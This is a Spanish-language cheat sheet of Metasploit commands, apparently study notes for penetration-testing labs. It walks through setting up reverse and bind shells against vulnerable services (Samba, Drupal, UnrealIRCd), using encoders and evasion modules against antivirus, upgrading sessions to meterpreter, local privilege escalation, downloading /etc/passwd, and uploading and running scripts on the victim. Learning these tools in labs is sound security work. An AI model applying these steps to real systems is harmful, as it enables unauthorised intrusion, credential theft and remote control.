COMANDOS METASPLOIT

 

msfdb Muestra los parámetros que podemos utilizar
msfdb init Primero inicializamos la base de datos en modo root sudo su
msfdb status Para saber que la base de datos esta inicializada
msfconsole

Para ejecutar el framework.

Exploits: es un programa o una secuencia de comandos que se aprovecha de un error para provocar un fallo en el sistema. Se utiliza para explotación de las vulnerabilidades que vayamos encontrando.

Auxiliary: se utiliza para actividades que ayuden a detectar como vulnerar una máquina, (realizar reconocimiento, DOS

Post: se utiliza para los equipos que ya tenemos acceso

Payloads: “Carga útil” Nos ayuda a crear aplicaciones con una carga maliciosa “virus” nos ayuda para obtener acceso remoto a un sistema

Encoders: “módulo de codificación” nos ayuda a ocultar los pailots que creemos, para que no sea reconocida por los antivirus.

Nops: Sirve para ejecutar los payloads de manera eficiente evitado que se detenga el proceso

Evasion: Nos ayuda a evadir la detección de un antivirus o sistema de seguridad

help Ver los comandos que podemos ejecutar
search samba Buscar un servicio específico. Check quiere decir si es vulnerable o no
search samba type:exploit Que nos muestre solo exploits
info (número que nos muestra en pantalla) 15 Para ver la información de los exploits
Search payload/windows Búsquedas de la plataforma o el módulo. Ejemplo: Muestra payloads

 

EXPLOTAR VULNERABILIDADES (SERVICIOS)

 

service nessusd start Desde el modo root, iniciamos el servicio de nessus
msfdb run Inicia metasploit
search (pegamos el contenido copiado) pegamos lo que hemos copiado en Nessus, es donde pone que puede ser vulnerabilidad por metasploit
use (numero de la lista) usar el script que le indicamos en el numero
show options Ver todos los parámetros que cuenta el exploid
set RHOST (IP) Modificar un valor
set RPORT_FTP (Numero de puerto) Modifica el puerto
Set SITEPATH /var/www/html Modificar la ruta del sitio
show payloads Mostrar payloads, para poder utilizar uno
set payload (“ruta o nombre”name”) Seleccionamos un payloads, conexión del maquina objetivo a nuestra máquina. Ejemplo el reverse TCP (vía Perl)
LHOST Ponemos nuestra IP de nuestra máquina. LOCALHOST
LPORT Maquina objetivo. LOCALPORT
set LHOST (nuestra ip) Para darle un valor a LHOST
info Para ver si es compatible con esta funcionalidad. Check supported: YES
check Para verificarlo
exploit Para ejecutar el exploit
set TARGETURI /drupal/ Modifica el TARGETURI (/drupal/ esto es la ruta que hemos buscado desde la ip de la maquina victima en el buscador Firefox)
searchsploit UnrealIRCd Busca información del sercicio , esto se hace fuera de metasploid
search UnrealIRCd Buscar vulnerabilidad
set payload (nombre del payload  o número) Con el Bind TCP somos nosotros quien iniciamos las comunicaciones.El reverse tiene mas posibilidades de exito
sessions -h Ver las opciones que tenemos con este comando
sessions Lista las sesiones que tenemos abiertas, también se puede poner sessions -l
session -i (numero de ID) Para tener acceso a una de las sesiones
session -i (numero de ID) -n (nombre que le queremos dar) Para tener acceso a una de las sesiones y cambiarle el nombre

 

POST EXPLOTACION

 

search Shell to meterpreter type:post Transforma una Shell en meterprete. solo lo busca en el módulo post
set SESION 3 Ponemos la sesión de UNREAL que es la 3(esto lo editamos con el comando sesión -i 3 UNRE…)
sessions -i 4 -n meterpreteUnreal Ha creado una nueva sesión y vamos a renombrar
sysinfo Ver el sistema en el que estamos, ip, SO..
getuid Ver el usuario en el que estamos (Get user ID)
search type:post local exploit Buscar vulnerabilidades locales post-explotacion. Desde metasploid
run (nombre de la ruta copiada) Ejecutar el script que hemos buscado antes que contiene las palabras locales Exploit. El resultado muestra los scripts que podemos explotar (los verdes) Copiamos la vulnerabilidad para luego utilizarla
use (nombre de la ruta vulnerable a privilegios) Entrar dentro de la vulnerabilidad
set sesión 4 Asignar el número de sesión
getpid Numero de proceso en el que estamos
ps Ver los procesos que se están ejecutando actualmente
pgrep -h Nos permite buscar según la cadena de caracteres que usemos. Ver las funcionalidadesque hace este comando
pgrep -f -l pkexec Muestra el nombre del proceso y el ID
search -f *passwd Buscar todo lo que contenga al final la palabra passwd
download -h Descargar el contenido. Esté muestra las opciones que puede hacer
download /etc/ passwd UserLinux Descarga dentro de la carpeta UserLinux (si no existe crea una automáticamente)
upload -h Subir un archivo a la maquina victima
upload bash.sh (ruta si fuera necesario) Sube el archivo bash.sh
sh bash.sh Primero tenemos que entrar en Shell y luego ejecutar el script que has subido poniendo sh bash.sh